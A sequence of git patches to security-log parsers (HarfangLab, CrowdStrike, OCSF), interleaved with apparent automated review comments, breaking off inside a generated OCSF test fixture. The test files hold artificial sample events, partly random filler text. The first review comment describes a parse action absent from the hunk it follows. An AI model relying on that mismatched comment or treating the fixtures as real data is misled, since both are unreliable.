b/VadeSecure/vade_secure_m365/_meta/manifest.yml @@ -1,7 +1,7 @@ uuid: e4a758fc-7620-49e6-b8ed-b7fb3d7fa232 name: Vade for M365 slug: vade-m365 -automation_connector_uuid: aa1f6d1a-8821-467f-9801-a5293ed37616 +automation_connector_uuid: d3860745-4433-4690-b025-378369ad7201 automation_module_uuid: 1411df5b-5de1-40bd-a988-725cfe692aff description: >- Vade for M365 offers all protections from Vade to our Microsoft 365 Email service 
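Review bot: `raise_errors: false` on the `kv.parse-kv` action turns a `Message` that is not key:value text into a silent no-op: `result` is left unset and whatever later reads it presumably comes out empty, with nothing in the event to show that parsing was attempted and failed. A comment on the added line, e.g. `# Message is free text for many event IDs; a failed key:value parse must not drop the event`, would record why errors are tolerated here rather than leaving it to be rediscovered. The stages that consume `result` are outside this hunk.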
From 60131a16889905c6cb7b1fd2044d4ad5ab89bfea Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Fri, 8 Nov 2024 13:48:57 +0200 Subject: [PATCH 014/150] HarfangLab - fix ip parsing --- HarfangLab/harfanglab/ingest/parser.yml | 5 +- .../harfanglab/tests/authentication_2.json | 103 ++++++++++++++++++ 2 files changed, 107 insertions(+), 1 deletion(-) create mode 100644 HarfangLab/harfanglab/tests/authentication_2.json diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml index 7ff16f6df..1376e0758 100644 --- a/HarfangLab/harfanglab/ingest/parser.yml +++ b/HarfangLab/harfanglab/ingest/parser.yml @@ -277,7 +277,6 @@ stages: event.type: ["info"] event.provider: "{{json_event.message.source_name}}" event.code: "{{json_event.message.event_id|string}}" - source.ip: "{{json_event.message.event_data.IpAddress}}" action.id: "{{json_event.message.event_id}}" user.name: "{{json_event.message.event_data.SubjectUserName}}" user.domain: "{{json_event.message.event_data.SubjectDomainName}}" @@ -475,6 +474,10 @@ stages: action.properties.TaskContentNew_Command: "{{parse_task_info.message.Task.Actions.Exec.Command}}" action.properties.TaskContentNew_Args: "{{parse_task_info.message.Task.Actions.Exec.Arguments}}" + - set: + source.ip: "{{json_event.message.event_data.IpAddress}}" + filter: "{{json_event.message.event_data.IpAddress | is_ipaddress}}" + authentication_info: actions: - set: diff --git a/HarfangLab/harfanglab/tests/authentication_2.json b/HarfangLab/harfanglab/tests/authentication_2.json new file mode 100644 index 000000000..0f5d169e9 --- /dev/null +++ b/HarfangLab/harfanglab/tests/authentication_2.json 
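Review bot: The `is_ipaddress` guard on the new `- set:` is the right fix for the `"-"` placeholder that `event_data.IpAddress` carries in the new `authentication_2.json` test, but nothing on the line says so; a comment such as `# IpAddress may be the "-" placeholder (see tests/authentication_2.json); keep only real addresses` would explain the filter to the next reader. The assignment also moves from the `- set:` at the old line 277 to a separate action at the end of the stage ending at the new line 477, whose header and any stage-level filter are outside the hunk, so it is worth confirming that the same set of events reaches it as before. `authentication_info`, which follows, continues outside the hunk.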
@@ -0,0 +1,103 @@ +{ + "input": { + "message": "{\"event_data\": {\"RestrictedAdminMode\": \"-\", \"SubjectUserName\": \"-\", \"SubjectUserSid\": \"S-1-0-0\", \"TargetOutboundUserName\": \"-\", \"ElevatedToken\": \"%%1843\", \"VirtualAccount\": \"%%1843\", \"ProcessId\": \"0x0\", \"AuthenticationPackageName\": \"NTLM\", \"LogonProcessName\": \"NtLmSsp\", \"IpPort\": \"-\", \"WorkstationName\": \"WORKSTATION_NAME\", \"LogonGuid\": \"{00000000-0000-0000-0000-000000000000}\", \"IpAddress\": \"-\", \"TargetLinkedLogonId\": \"0x0\", \"SubjectDomainName\": \"-\", \"TargetOutboundDomainName\": \"-\", \"ImpersonationLevel\": \"%%1833\", \"SubjectLogonId\": \"0x0\", \"TargetLogonId\": \"0x6accabcc3\", \"LogonType\": \"3\", \"TargetUserSid\": \"S-1-5-21-11111111111-111111111111-11111111-111\", \"LmPackageName\": \"NTLM V2\", \"TargetUserName\": \"johndoe\", \"TransmittedServices\": \"-\", \"TargetDomainName\": \"EXAMPLE\", \"ProcessName\": \"-\", \"KeyLength\": \"128\"}, \"groups\": [], \"type\": \"wineventlog\", \"computer_name\": \"example.local\", \"destination\": \"syslog\", \"record_number\": 177355019, \"@Version\": \"1\", \"log_name\": \"Security\", \"@event_create_date\": \"2024-11-05T11:10:19.543Z\", \"level\": \"log_always\", \"timestamp\": \"2024-11-05T11:10:20.274688148Z\", \"process_id\": 704, \"user_data\": {}, \"log_type\": \"eventlog\", \"keywords\": [\"AuditSuccess\", \"ReservedKeyword63\"], \"user\": {\"domain\": \"\", \"identifier\": \"\", \"name\": \"\", \"type\": \"unknown\"}, \"tenant\": \"11111111111111111111\", \"thread_id\": 9168, \"agent\": {\"dnsdomainname\": \"example.local\", \"osproducttype\": \"Windows Server 2022 Datacenter\", \"domain\": null, \"osversion\": \"10.0.20348\", \"ostype\": \"windows\", \"distroid\": null, \"domainname\": \"EXAMPLE\", \"additional_info\": {}, \"version\": \"4.1.6\", \"hostname\": \"EXAMPLE\", \"agentid\": \"555555555-9999-9999-9999-3e333333cccc\"}, \"event_id\": 4624, \"provider_guid\": 
\"555555555-9999-9999-9999-3e333333cccc\", \"source_name\": \"Microsoft-Windows-Security-Auditing\"}" + }, + "expected": { + "message": "{\"event_data\": {\"RestrictedAdminMode\": \"-\", \"SubjectUserName\": \"-\", \"SubjectUserSid\": \"S-1-0-0\", \"TargetOutboundUserName\": \"-\", \"ElevatedToken\": \"%%1843\", \"VirtualAccount\": \"%%1843\", \"ProcessId\": \"0x0\", \"AuthenticationPackageName\": \"NTLM\", \"LogonProcessName\": \"NtLmSsp\", \"IpPort\": \"-\", \"WorkstationName\": \"WORKSTATION_NAME\", \"LogonGuid\": \"{00000000-0000-0000-0000-000000000000}\", \"IpAddress\": \"-\", \"TargetLinkedLogonId\": \"0x0\", \"SubjectDomainName\": \"-\", \"TargetOutboundDomainName\": \"-\", \"ImpersonationLevel\": \"%%1833\", \"SubjectLogonId\": \"0x0\", \"TargetLogonId\": \"0x6accabcc3\", \"LogonType\": \"3\", \"TargetUserSid\": \"S-1-5-21-11111111111-111111111111-11111111-111\", \"LmPackageName\": \"NTLM V2\", \"TargetUserName\": \"johndoe\", \"TransmittedServices\": \"-\", \"TargetDomainName\": \"EXAMPLE\", \"ProcessName\": \"-\", \"KeyLength\": \"128\"}, \"groups\": [], \"type\": \"wineventlog\", \"computer_name\": \"example.local\", \"destination\": \"syslog\", \"record_number\": 177355019, \"@Version\": \"1\", \"log_name\": \"Security\", \"@event_create_date\": \"2024-11-05T11:10:19.543Z\", \"level\": \"log_always\", \"timestamp\": \"2024-11-05T11:10:20.274688148Z\", \"process_id\": 704, \"user_data\": {}, \"log_type\": \"eventlog\", \"keywords\": [\"AuditSuccess\", \"ReservedKeyword63\"], \"user\": {\"domain\": \"\", \"identifier\": \"\", \"name\": \"\", \"type\": \"unknown\"}, \"tenant\": \"11111111111111111111\", \"thread_id\": 9168, \"agent\": {\"dnsdomainname\": \"example.local\", \"osproducttype\": \"Windows Server 2022 Datacenter\", \"domain\": null, \"osversion\": \"10.0.20348\", \"ostype\": \"windows\", \"distroid\": null, \"domainname\": \"EXAMPLE\", \"additional_info\": {}, \"version\": \"4.1.6\", \"hostname\": \"EXAMPLE\", \"agentid\": 
\"555555555-9999-9999-9999-3e333333cccc\"}, \"event_id\": 4624, \"provider_guid\": \"555555555-9999-9999-9999-3e333333cccc\", \"source_name\": \"Microsoft-Windows-Security-Auditing\"}", + "event": { + "action": "authentication_network", + "category": [ + "authentication" + ], + "code": "4624", + "dataset": "eventlog", + "provider": "Microsoft-Windows-Security-Auditing", + "type": [ + "info", + "start" + ] + }, + "@timestamp": "2024-11-05T11:10:19.543000Z", + "action": { + "id": 4624, + "outcome": "success", + "properties": { + "AuthenticationPackageName": "NTLM", + "ElevatedToken": "%%1843", + "ImpersonationLevel": "%%1833", + "KeyLength": "128", + "LmPackageName": "NTLM V2", + "LogonGuid": "{00000000-0000-0000-0000-000000000000}", + "LogonProcessName": "NtLmSsp", + "LogonType": "3", + "ProcessId": "0x0", + "SubjectLogonId": "0x0", + "SubjectUserSid": "S-1-0-0", + "TargetDomainName": "EXAMPLE", + "TargetLinkedLogonId": "0x0", + "TargetLogonId": "0x6accabcc3", + "TargetUserName": "johndoe", + "TargetUserSid": "S-1-5-21-11111111111-111111111111-11111111-111", + "VirtualAccount": "%%1843", + "WorkstationName": "WORKSTATION_NAME" + } + }, + "agent": { + "id": "555555555-9999-9999-9999-3e333333cccc", + "name": "harfanglab" + }, + "harfanglab": { + "groups": [] + }, + "host": { + "domain": "EXAMPLE", + "hostname": "EXAMPLE", + "name": "EXAMPLE", + "os": { + "full": "Windows Server 2022 Datacenter", + "version": "10.0.20348" + } + }, + "log": { + "hostname": "EXAMPLE" + }, + "organization": { + "id": "11111111111111111111" + }, + "related": { + "hosts": [ + "EXAMPLE" + ] + }, + "sekoiaio": { + "authentication": { + "process": { + "name": "NtLmSsp" + } + }, + "client": { + "name": "WORKSTATION_NAME", + "os": { + "type": "windows" + } + }, + "server": { + "name": "EXAMPLE", + "os": { + "type": "windows" + } + } + }, + "server": { + "domain": "EXAMPLE" + }, + "user": { + "id": "S-1-0-0", + "target": { + "domain": "EXAMPLE", + "id": 
"S-1-5-21-11111111111-111111111111-11111111-111", + "name": "johndoe" + } + } + } +} \ No newline at end of file From eb0b0cc5c8a73329d021db69174c4f92ac35bfaa Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Mon, 11 Nov 2024 11:14:06 +0200 Subject: [PATCH 015/150] CrowdStrike Telemetry - parse ContextBaseFileName --- CrowdStrike/crowdstrike-telemetry/_meta/fields.yml | 5 +++++ CrowdStrike/crowdstrike-telemetry/ingest/parser.yml | 3 +++ .../crowdstrike-telemetry/tests/telemetry_event_26.json | 1 + 3 files changed, 9 insertions(+) diff --git a/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml b/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml index a59b68006..75e1b7434 100644 --- a/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml +++ b/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml @@ -1,3 +1,8 @@ +crowdstrike.base_filename: + description: Base Filename + name: crowdstrike.base_filename + type: keyword + crowdstrike.customer_id: description: Customer ID (cid) name: crowdstrike.customer_id diff --git a/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml b/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml index f5da81755..03e9819e7 100644 --- a/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml +++ b/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml @@ -53,6 +53,9 @@ stages: "host.domain": "{{parsed_event.message.MachineDomain}}" "host.mac": "{{parsed_event.message.MAC}}" + - set: + crowdstrike.base_filename: "{{parsed_event.message.ContextBaseFileName}}" + set_registry_fields: actions: - set: diff --git a/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json b/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json index 82baec896..1e7368eee 100644 --- a/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json +++ b/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json @@ -18,6 +18,7 @@ "id": "111111111111111" }, "crowdstrike": { + "base_filename": "svchost.exe", "customer_id": "222222222222222222222" }, "file": { 
From 87b46503f68a575197d5242d7cb6a073ab84d871 Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia
Date: Mon, 11 Nov 2024 14:29:06 +0200
Subject: [PATCH 016/150] Parse new coordinates fields

---
 OCSF/ocsf/ingest/parser.yml | 11 ++++++-----
 1 file changed, 6 insertions(+), 5 deletions(-)

diff --git a/OCSF/ocsf/ingest/parser.yml b/OCSF/ocsf/ingest/parser.yml
index 765a6a76d..67859cf11 100644
--- a/OCSF/ocsf/ingest/parser.yml
+++ b/OCSF/ocsf/ingest/parser.yml
@@ -454,8 +454,8 @@ stages:
 host.geo.city_name: "{{ parse_event.message.device.location.city }}"
 host.geo.continent_name: "{{ parse_event.message.device.location.continent }}"
 host.geo.country_iso_code: "{{ parse_event.message.device.location.country }}"
- host.geo.location.lon: "{{ parse_event.message.device.location.coordinates[0] }}"
- host.geo.location.lat: "{{ parse_event.message.device.location.coordinates[1] }}"
+ host.geo.location.lon: "{{ parse_event.message.device.location.coordinates[0] or parse_event.message.device.location.long }}"
+ host.geo.location.lat: "{{ parse_event.message.device.location.coordinates[1] or parse_event.message.device.location.lat }}"
 host.geo.name: "{{ parse_event.message.device.location.desc }}"
 host.geo.postal_code: "{{ parse_event.message.device.location.postal_code }}"
 host.geo.region_iso_code: "{{ parse_event.message.device.location.region }}"
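Review bot: `coordinates[0] or parse_event.message.device.location.long` treats a legitimate longitude of `0` (or `0.0`) as missing, because `0` is falsy in Jinja, and falls back to `long` — which, when absent, leaves `host.geo.location.lon` empty for an event that did carry a coordinate; the same applies to `lat` here and to the `source.geo`/`destination.geo` lines in the two hunks at `@@ -534` and `@@ -557`. A presence test rather than a truthiness test avoids it: `host.geo.location.lon: "{{ parse_event.message.device.location.coordinates[0] if parse_event.message.device.location.get('coordinates') else parse_event.message.device.location.long }}"`. Whether `coordinates` can be absent while `location` is present depends on the stage's filter, which is outside the hunk.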
@@ -534,7 +534,8 @@ stages:
 - set:
 source.geo.city_name: "{{ parse_event.message.src_endpoint.location.city }}"
 source.geo.continent_name: "{{ parse_event.message.src_endpoint.location.continent }}"
- source.geo.location: "{{ parse_event.message.src_endpoint.location.coordinates }}"
+ source.geo.location.lon: "{{ parse_event.message.src_endpoint.location.coordinates[0] or parse_event.message.src_endpoint.location.long }}"
+ source.geo.location.lat: "{{ parse_event.message.src_endpoint.location.coordinates[1] or parse_event.message.src_endpoint.location.lat }}"
 source.geo.country_iso_code: "{{ parse_event.message.src_endpoint.location.country }}"
 source.geo.name: "{{ parse_event.message.src_endpoint.location.desc }}"
 source.geo.postal_code: "{{ parse_event.message.src_endpoint.location.postal_code }}"
@@ -557,8 +558,8 @@ stages:
 - set:
 destination.geo.city_name: "{{ parse_event.message.dst_endpoint.location.city }}"
 destination.geo.continent_name: "{{ parse_event.message.dst_endpoint.location.continent }}"
- destination.geo.location.lon: "{{ parse_event.message.dst_endpoint.location.coordinates[0] }}"
- destination.geo.location.lat: "{{ parse_event.message.dst_endpoint.location.coordinates[1] }}"
+ destination.geo.location.lon: "{{ parse_event.message.dst_endpoint.location.coordinates[0] or parse_event.message.dst_endpoint.location.long }}"
+ destination.geo.location.lat: "{{ parse_event.message.dst_endpoint.location.coordinates[1] or parse_event.message.dst_endpoint.location.lat }}"
 destination.geo.country_iso_code: "{{ parse_event.message.dst_endpoint.location.country }}"
 destination.geo.name: "{{ parse_event.message.dst_endpoint.location.desc }}"
 destination.geo.postal_code: "{{ parse_event.message.dst_endpoint.location.postal_code }}"

From ee80c51721c0d1599f979a7939ad9f931d31934a Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia Date: Mon, 11 Nov 2024 15:25:34 +0200 Subject: [PATCH 017/150] Support new event types --- OCSF/ocsf/ingest/parser.yml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/OCSF/ocsf/ingest/parser.yml b/OCSF/ocsf/ingest/parser.yml index 67859cf11..b76dd0a34 100644 --- a/OCSF/ocsf/ingest/parser.yml +++ b/OCSF/ocsf/ingest/parser.yml 
@@ -79,16 +79,16 @@ pipeline: - name: set_common_fields - name: pipeline_object_actor - filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1001,1002,1003,1004,1005,1006,1007,1008,1009,1010,2002,2003,2004,2006,3001,3002,3003,3004,3005,3006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,4013,4014,5001,5002,5003,5006,5007,5008,5009,5010,5011,5012,5013,5014,5015,5016,5017,5018,5019,6001,6002,6003,6004,6005,6006,6007,201001,201002,201003,205004,205005,205019,99901006,99903001,99904001,99904002,99904009,99904010,99936001,99936002,99937002] and parse_event.message.get('actor') != None }}" + filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1001,1002,1003,1004,1005,1006,1007,1008,1009,1010,2002,2003,2004,2006,3001,3002,3003,3004,3005,3006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,4013,4014,5001,5002,5003,5006,5007,5008,5009,5010,5011,5012,5013,5014,5015,5016,5017,5018,5019,5020,6001,6002,6003,6004,6005,6006,6007,201001,201002,201003,201004,205004,205005,205019,99901006,99903001,99904001,99904002,99904009,99904010,99936001,99936002,99937002] and parse_event.message.get('actor') != None }}" - name: pipeline_object_attack - filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1001,1002,1003,1004,1005,1006,1007,1008,1009,1010,2001,2004,2005,2006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,4013,4014,6001,6005,201001,201002,201003,99901006,99902003,99904001,99904002,99904009,99904010] and parse_event.message.get('attacks') != None }}" + filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1001,1002,1003,1004,1005,1006,1007,1009,1010,2001,2004,2005,2006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,4013,4014,6001,6005,201001,201002,201003,99901006,99902003,99904001,99904002,99904009,99904010] and parse_event.message.get('attacks') != None }}" - name: 
pipeline_object_network_connection_info - filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [4001,4002,4003,4004,4005,4006,4007,4008,4010,4013,4014,5012,6006,99904009,99904010,99931006,99932007,99933005] and parse_event.message.get('connection_info') != None }}" + filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [4001,4002,4003,4004,4005,4006,4007,4008,4010,4013,4014,5012,6006,7004,99904009,99904010,99931006,99932007,99933005] and parse_event.message.get('connection_info') != None }}" - name: pipeline_object_device - filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1001,1002,1003,1004,1005,1006,1007,1008,1009,1010,2002,2003,2004,2006,3001,3002,3003,3004,3005,3006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,4013,4014,5001,5002,5004,5006,5007,5008,5009,5010,5011,5012,5013,5014,5015,5016,5017,5018,5019,6001,6002,6004,6007,201001,201002,201003,205004,205005,205019,99901006,99903001,99904001,99904002,99904009,99904010,99936001,99936002] and parse_event.message.get('device') != None }}" + filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1001,1002,1003,1004,1005,1006,1007,1008,1009,1010,2002,2003,2004,2006,3001,3002,3003,3004,3005,3006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,4013,4014,5001,5002,5004,5006,5007,5008,5009,5010,5011,5012,5013,5014,5015,5016,5017,5018,5019,5020,6001,6002,6004,6007,201001,201002,201003,201004,205004,205005,205019,99901006,99903001,99904001,99904002,99904009,99904010,99936001,99936002] and parse_event.message.get('device') != None }}" - name: pipeline_object_http_request filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [3001,3002,3003,3004,3005,3006,4002,6001,6003,6004,6005,99937002,99938001] and parse_event.message.get('http_request') != None }}" 
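Review bot: The new `pipeline_object_attack` filter drops `1008` from its class_uid list (old: `1007,1008,1009`; new: `1007,1009`), which the subject "Support new event types" does not mention, so it reads as an accidental loss of `attacks` parsing for class 1008 rather than a deliberate change. If the removal is intended (for instance because 1008 no longer carries `attacks` in the schema version being targeted), the commit message or a comment above the filter should say so; otherwise `1008` should be put back in the list. The other three filters in this hunk (`pipeline_object_actor`, `pipeline_object_network_connection_info`, `pipeline_object_device`) only add entries (`5020`, `201004`, `7004`).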
@@ -100,7 +100,7 @@ pipeline: filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1008,2006,3001,3002,3003,3004,3005,3006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4013,4014,6001,6003,6004,6005,6006,99904009,99904010,99937002,99938001] and parse_event.message.get('dst_endpoint') != None or parse_event.message.get('src_endpoint') != None }}" - name: pipeline_object_process - filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1004,1007,2001,5011,5012,5015,99932006,99932007,99932011,99933006,99934001,99935002] and parse_event.message.get('process') != None }}" + filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1004,1007,2001,5011,5012,5015,7003,99932006,99932007,99932011,99933006,99934001,99935002] and parse_event.message.get('process') != None }}" - name: pipeline_object_proxy filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [3006,4001,4002,4003,4004,4005,4006,4007,4008,4010,4013,4014,6004,99904009,99904010] and parse_event.message.get('proxy') != None }}" 
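Review bot: The first context line of this hunk (the src/dst endpoint filter) ends with `... and parse_event.message.get('dst_endpoint') != None or parse_event.message.get('src_endpoint') != None }}`, which Jinja parses as `(class_uid in [...] and dst_endpoint present) or src_endpoint present`, so any event with a `src_endpoint` enters that pipeline regardless of class; the commit does not touch it, but it sits directly above the `7003` addition under review and is the odd one out among the sibling filters. Parenthesising the two presence checks, `... and (parse_event.message.get('dst_endpoint') != None or parse_event.message.get('src_endpoint') != None) }}`, gives the class-list gate the effect it has in the other entries. That entry's `- name:` line is outside the hunk.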
@@ -115,7 +115,7 @@ pipeline: filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [3001,3002,3003,3005,3006,4014,5003,5018,99932017] and parse_event.message.get('user') != None }}" - name: pipeline_object_file - filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1001,1008,2006,4002,4005,4006,4007,4008,4010,4011,5007,6006,99901006,99903001,99904001,99931004,99931007,99931010,99932001,99933000] and parse_event.message.get('file') != None }}" + filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1001,1008,2006,4002,4005,4006,4007,4008,4010,4011,5007,6006,7002,99901006,99903001,99904001,99931004,99931007,99931010,99932001,99933000] and parse_event.message.get('file') != None }}" - name: pipeline_object_system_activity_helper filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1002,1005,1006,1007,5010,5011,99932004,99932006,99933002,99933004] }}" From 8bea0aff54a582569ef9a0031f3332f82b71ece9 Mon Sep 17 00:00:00 2001 
From: lvoloshyn-sekoia Date: Tue, 12 Nov 2024 10:22:34 +0200 Subject: [PATCH 018/150] Tests and smart descriptions --- OCSF/ocsf/_meta/smart-descriptions.json | 44 +++++++++ ...generated_file_remediation_activity_1.json | 39 ++++++++ ...generated_file_remediation_activity_2.json | 39 ++++++++ ...generated_file_remediation_activity_3.json | 43 ++++++++ ...erated_network_remediation_activity_1.json | 29 ++++++ ...erated_network_remediation_activity_2.json | 30 ++++++ ...erated_process_remediation_activity_1.json | 78 +++++++++++++++ ...erated_process_remediation_activity_2.json | 69 +++++++++++++ .../tests/generated_windows_service_1.json | 97 +++++++++++++++++++ 9 files changed, 468 insertions(+) create mode 100644 OCSF/ocsf/tests/generated_file_remediation_activity_1.json create mode 100644 OCSF/ocsf/tests/generated_file_remediation_activity_2.json create mode 100644 OCSF/ocsf/tests/generated_file_remediation_activity_3.json create mode 100644 OCSF/ocsf/tests/generated_network_remediation_activity_1.json create mode 100644 OCSF/ocsf/tests/generated_network_remediation_activity_2.json create mode 100644 OCSF/ocsf/tests/generated_process_remediation_activity_1.json create mode 100644 OCSF/ocsf/tests/generated_process_remediation_activity_2.json create mode 100644 OCSF/ocsf/tests/generated_windows_service_1.json diff --git a/OCSF/ocsf/_meta/smart-descriptions.json b/OCSF/ocsf/_meta/smart-descriptions.json index d03bc41fb..6947b5762 100644 --- a/OCSF/ocsf/_meta/smart-descriptions.json +++ b/OCSF/ocsf/_meta/smart-descriptions.json 
@@ -928,5 +928,49 @@ "field": "ocsf.activity_name" } ] + }, + { + "value": "File Remediation Activity: {ocsf.activity_name} file {file.name}", + "conditions": [ + { + "field": "ocsf.class_uid", + "value": 7002 + }, + { + "field": "ocsf.activity_name" + }, + { + "field": "file.name" + } + ] + }, + { + "value": "Process Remediation Activity: {ocsf.activity_name} file {file.name} by process {process.name}", + "conditions": [ + { + "field": "ocsf.class_uid", + "value": 7003 + }, + { + "field": "ocsf.activity_name" + }, + { + "field": "file.name" + }, + { + "field": "process.name" + } + ] + }, + { + "value": "{ocsf.class_name}: {ocsf.activity_name}", + "conditions": [ + { + "field": "ocsf.class_name" + }, + { + "field": "ocsf.activity_name" + } + ] } ] diff --git a/OCSF/ocsf/tests/generated_file_remediation_activity_1.json b/OCSF/ocsf/tests/generated_file_remediation_activity_1.json new file mode 100644 index 000000000..29fe10f1c --- /dev/null +++ b/OCSF/ocsf/tests/generated_file_remediation_activity_1.json 
@@ -0,0 +1,39 @@ +{ + "input": { + "message": "{\"status\": \"Does Not Exist\", \"time\": 1731328594225, \"file\": {\"name\": \"html.pkg\", \"type\": \"Local Socket\", \"version\": \"1.3.0\", \"path\": \"canyon upgrading wool/marco.fla/html.pkg\", \"ext\": \"honest borough graduated\", \"type_id\": 5, \"mime_type\": \"pr/anything\", \"parent_folder\": \"canyon upgrading wool/marco.fla\", \"confidentiality\": \"prisoner fought submission\", \"hashes\": [{\"value\": \"BDD5C7FF933889BB4DE51943D295A2C3BF3CCE0EE5D7196DB36A7B734E44B9478FE798F4A6E72C0FB13B30746C0434F713614EBDB498B03029382CF837E23878\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}], \"xattributes\": {}}, \"metadata\": {\"version\": \"1.3.0\", \"product\": {\"name\": \"older bangladesh caused\", \"version\": \"1.3.0\", \"lang\": \"en\", \"cpe_name\": \"m ryan proof\", \"url_string\": \"web\", \"vendor_name\": \"directed villas incorrect\"}, \"labels\": [\"range\", \"mild\"], \"profiles\": [], \"event_code\": \"ethnic\", \"log_name\": \"wisconsin scenes croatia\", \"log_provider\": \"consolidated month mil\", \"logged_time\": 1731328594209, \"loggers\": [{\"name\": \"generated dale subsection\", \"version\": \"1.3.0\", \"device\": {\"owner\": {\"name\": \"Chapter\", \"type\": \"User\", \"uid\": \"95fb04dc-a029-11ef-9566-0242ac110007\", \"type_id\": 1, \"risk_level\": \"Info\", \"risk_level_id\": 0}, \"type\": \"IOT\", \"os\": {\"name\": \"polls knew problem\", \"type\": \"Windows\", \"type_id\": 100, \"cpe_name\": \"architects letting hay\"}, \"desc\": \"tradition automated mysql\", \"hostname\": \"meters.edu\", \"uid\": \"95faf0a0-a029-11ef-a3c0-0242ac110007\", \"image\": {\"name\": \"ace tracy webshots\", \"path\": \"joined also europe\", \"uid\": \"95fbbb16-a029-11ef-9965-0242ac110007\"}, \"groups\": [{\"uid\": \"95faa5fa-a029-11ef-b64e-0242ac110007\"}], \"type_id\": 7, \"imei\": \"summary ieee rated\", \"interface_name\": \"marsh shopper guides\", \"interface_uid\": 
\"95fa9074-a029-11ef-931d-0242ac110007\", \"region\": \"accepting sword tab\", \"risk_level\": \"High\", \"risk_level_id\": 3, \"risk_score\": 4, \"zone\": \"ability footage nt\"}, \"product\": {\"name\": \"quote licence channel\", \"version\": \"1.3.0\", \"uid\": \"95fc351e-a029-11ef-87b2-0242ac110007\", \"feature\": {\"name\": \"adequate drainage dear\", \"version\": \"1.3.0\", \"uid\": \"95fc4cd4-a029-11ef-9a35-0242ac110007\"}, \"url_string\": \"makes\", \"vendor_name\": \"hybrid licensing faster\"}, \"uid\": \"95fc5602-a029-11ef-9902-0242ac110007\", \"log_name\": \"vegas cave greatly\", \"log_provider\": \"ieee cancer pharmaceuticals\", \"logged_time\": 1731328594222}, {\"name\": \"hostels given kill\", \"version\": \"1.3.0\", \"product\": {\"name\": \"css ks demonstrate\", \"version\": \"1.3.0\", \"uid\": \"95fc6b06-a029-11ef-b5a5-0242ac110007\", \"lang\": \"en\", \"url_string\": \"alternatives\", \"vendor_name\": \"television preventing blades\"}, \"uid\": \"95fc72c2-a029-11ef-994a-0242ac110007\", \"log_provider\": \"alignment free mines\", \"logged_time\": 1731328594222}], \"original_time\": \"drill blogs lemon\", \"processed_time\": 1731328594222, \"tenant_uid\": \"95fc7d12-a029-11ef-bfaa-0242ac110007\"}, \"severity\": \"illustrations\", \"duration\": 559843632, \"category_uid\": 7, \"activity_id\": 2, \"type_uid\": 700202, \"type_name\": \"File Remediation Activity: Evict\", \"observables\": [{\"name\": \"chen architects purchased\", \"type\": \"File\", \"type_id\": 24}, {\"name\": \"controlling sublime bp\", \"type\": \"URL String\", \"type_id\": 6}], \"category_name\": \"Remediation\", \"class_uid\": 7002, \"class_name\": \"File Remediation Activity\", \"timezone_offset\": 58, \"activity_name\": \"Evict\", \"command_uid\": \"95fcdc6c-a029-11ef-acb7-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"95fc9ff4-a029-11ef-8605-0242ac110007\"}, \"d3f_technique\": {\"name\": \"determine wanting pursuant\"}}, {\"version\": 
